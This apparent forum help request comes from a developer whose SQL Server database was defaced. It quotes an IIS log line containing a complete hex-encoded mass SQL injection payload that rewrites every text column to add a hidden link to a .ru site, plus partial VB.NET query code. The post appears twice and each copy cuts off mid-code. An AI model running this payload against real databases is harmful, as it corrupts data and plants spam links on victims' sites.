SQL被流入恶意病毒代码
日期:2014-05-17 浏览次数:20458 次
SQL被注入恶意病毒代码
数据库所有字符型字段都被注入以下
</title><style>.adkk{position:absolute;clip:rect(451px,auto,auto,451px);}</style>
查iis日志发现的攻击sql代码
2012-12-17 11:10:58 W3SVC705530920 218.1.111.48 GET /default.aspx ID=26CE75CD-2E1A-47B9-8454-B7267E4E060F1'+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e61646b6b7b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834353170782c6175746f2c6175746f2c3435317078293b7d3c2f7374796c653e3c64697620636c6173733d61646b6b3e3c6120687265663d687474703a2f2f3131366a75726973742e7275203ee0e4e2eeeae0f22defee2de6e8ebe8f9edfbec2de2eeeff0eef1e0ec3c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)-- 80 - 109.230.251.12 Mozilla/5.0+(Windows;+U;+Windows+NT+5.2;+en-US)+AppleWebKit/534.17+(KHTML,+like+Gecko)+Chrome/11.0.652.0+Safari/534.17 200 0 0
我这个页面就是根据id获取一些数据而已,id就是我方法的CategoryID
Public Function GetCategoryData(ByVal BrandID As Integer, ByVal CategoryID As Guid, ByVal sLC As String, ByVal sCatMode As String) As DataTable
'Dim drResult As DataRow = Nothing
Dim dt As DataTable = Nothing
Using cmd As New SqlCommand()
cmd.CommandType = CommandType.Text
cmd.CommandText = "Select * From CTCategory Where BrandID = @BrandID And LC= @sLC"
Select Case sCatMode
Case "Main"
cmd.CommandText = cmd.CommandText & " And CategoryID=@CategoryID "
Case "Sub"
&
数据库所有字符型字段都被注入以下
</title><style>.adkk{position:absolute;clip:rect(451px,auto,auto,451px);}</style>
查iis日志发现的攻击sql代码
2012-12-17 11:10:58 W3SVC705530920 218.1.111.48 GET /default.aspx ID=26CE75CD-2E1A-47B9-8454-B7267E4E060F1'+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e61646b6b7b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834353170782c6175746f2c6175746f2c3435317078293b7d3c2f7374796c653e3c64697620636c6173733d61646b6b3e3c6120687265663d687474703a2f2f3131366a75726973742e7275203ee0e4e2eeeae0f22defee2de6e8ebe8f9edfbec2de2eeeff0eef1e0ec3c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)-- 80 - 109.230.251.12 Mozilla/5.0+(Windows;+U;+Windows+NT+5.2;+en-US)+AppleWebKit/534.17+(KHTML,+like+Gecko)+Chrome/11.0.652.0+Safari/534.17 200 0 0
我这个页面就是根据id获取一些数据而已,id就是我方法的CategoryID
Public Function GetCategoryData(ByVal BrandID As Integer, ByVal CategoryID As Guid, ByVal sLC As String, ByVal sCatMode As String) As DataTable
'Dim drResult As DataRow = Nothing
Dim dt As DataTable = Nothing
Using cmd As New SqlCommand()
cmd.CommandType = CommandType.Text
cmd.CommandText = "Select * From CTCategory Where BrandID = @BrandID And LC= @sLC"
Select Case sCatMode
Case "Main"
cmd.CommandText = cmd.CommandText & " And CategoryID=@CategoryID "
Case "Sub"
&
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
